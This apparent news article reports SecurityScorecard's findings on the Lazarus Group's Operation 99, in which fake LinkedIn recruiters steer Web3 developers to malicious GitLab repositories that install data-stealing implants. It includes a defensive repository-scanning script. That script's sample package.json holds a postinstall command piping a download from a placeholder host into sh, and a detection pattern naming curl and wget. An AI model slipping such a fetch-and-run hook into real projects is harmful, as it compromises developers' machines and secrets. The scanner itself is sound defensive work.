The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware.
"The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat Research and Intelligence at SecurityScorecard, said in a new report published today.
"Once a victim takes the bait, they're directed to clone a malicious GitLab repository – seemingly harmless, but packed with disaster. The cloned code connects to command-and-control (C2) servers, embedding malware into the victim's environment."
Victims of the campaign have been identified across the globe, with a significant concentration recorded in Italy. A lesser number of impacted victims are located in Argentina, Brazil, Egypt, France, Germany, India, Indonesia, Mexico, Pakistan, the Philippines, the U.K., and the U.S.
The cybersecurity company said the campaign, which it discovered on January 9, 2025, builds on job-themed tactics previously observed in Lazarus attacks, such as Operation Dream Job (aka NukeSped), to specifically focus on targeting developers in Web3 and cryptocurrency fields.
What makes Operation 99 unique is that it entices developers with coding projects as part of an elaborate recruitment scheme that involves crafting deceptive LinkedIn profiles, which are then used to direct them to rogue GitLab repositories.
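The lure described above only pays off once the developer builds or runs the cloned "coding test," which is when install-time hooks can call out to C2. The following is an added example (not SecurityScorecard's or the article's code) of a pre-build check that flags auto-executing hooks in a freshly cloned repository; the file list, regex indicators and sample repository are assumptions constructed for illustration.

```python
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle events that run automatically on `npm install` (real event names)
NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare"}
# Other files that execute during build/test without an explicit opt-in (assumed list)
AUTO_RUN_FILES = ("setup.py", "Makefile", ".vscode/tasks.json")
# Crude indicators of fetch-and-execute or remote-callback behaviour (assumed heuristics)
NET_PATTERN = re.compile(r"https?://|\bcurl\b|\bwget\b|child_process|\beval\(", re.I)


def scan_repo(root: str) -> list[str]:
    """Return human-readable findings for auto-executing code in the clone at `root`."""
    root_path = Path(root)
    findings: list[str] = []
    pkg = root_path / "package.json"
    if pkg.is_file():
        try:
            scripts = json.loads(pkg.read_text(errors="ignore")).get("scripts", {})
        except json.JSONDecodeError:
            scripts = {}
        for name, cmd in scripts.items():
            if name in NPM_LIFECYCLE:  # runs without the developer ever typing `npm run`
                flag = " [network/exec]" if NET_PATTERN.search(str(cmd)) else ""
                findings.append(f"package.json lifecycle '{name}'{flag}: {cmd}")
    for rel in AUTO_RUN_FILES:
        path = root_path / rel
        if path.is_file() and NET_PATTERN.search(path.read_text(errors="ignore")):
            findings.append(f"{rel}: network/exec indicator")
    return findings


def demo() -> list[str]:
    """Build a constructed sample clone with a suspicious postinstall hook and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "package.json").write_text(json.dumps({
            "name": "coding-test",  # constructed sample, not a real repository
            "scripts": {
                "test": "jest",
                "postinstall": "curl https://example.invalid/setup | sh",
            },
        }))
        Path(tmp, "Makefile").write_text("all:\n\t@echo build\n")  # benign, should not be flagged
        return scan_repo(tmp)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run it against a clone before `npm install`, `pip install -e .` or `make`; any finding means reading the hook by hand before letting the build touch the network.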
The end goal of the attacks is to deploy data-stealing implants that are capable of extracting source code, secrets, cryptocurrency wallet keys, and other sensitive data from development environments.
These include Main5346 and its variant Main99, which serves as a downloader for three additional payloads –
- Payload99/73 (and its functionally similar Payload5346), which collects system data (e.g., files and clipboard content), terminates web browser processes, executes arbitrary commands, and establishes a persistent connection to the C2 server
- Brow99/73, which steals data from web browsers to facilitate credential theft
- MCLIP, which monitors and exfiltrates keyboard and clipboard activity in real-time
"By compromising developer accounts, attackers not only exfiltrate intellectual property but also gain access to cryptocurrency wallets, enabling direct financial theft," the company said. "The targeted theft of private and secret keys could lead to millions in stolen digital assets, furthering the Lazarus Group's financial goals."
The malware architecture adopts a modular design, is flexible, and is capable of operating across Windows, macOS, and Linux operating systems. It also serves to highlight the ever-evolving and adaptable nature of nation-state cyber threats.
"For North Korea, hacking is a revenue generating lifeline," Sherstobitoff said. "The Lazarus Group has consistently funneled stolen cryptocurrency to fuel the regime's ambitions, amassing staggering sums. With Web3 and cryptocurrency industries booming, Operation 99 zeroes in on these high-growth sectors."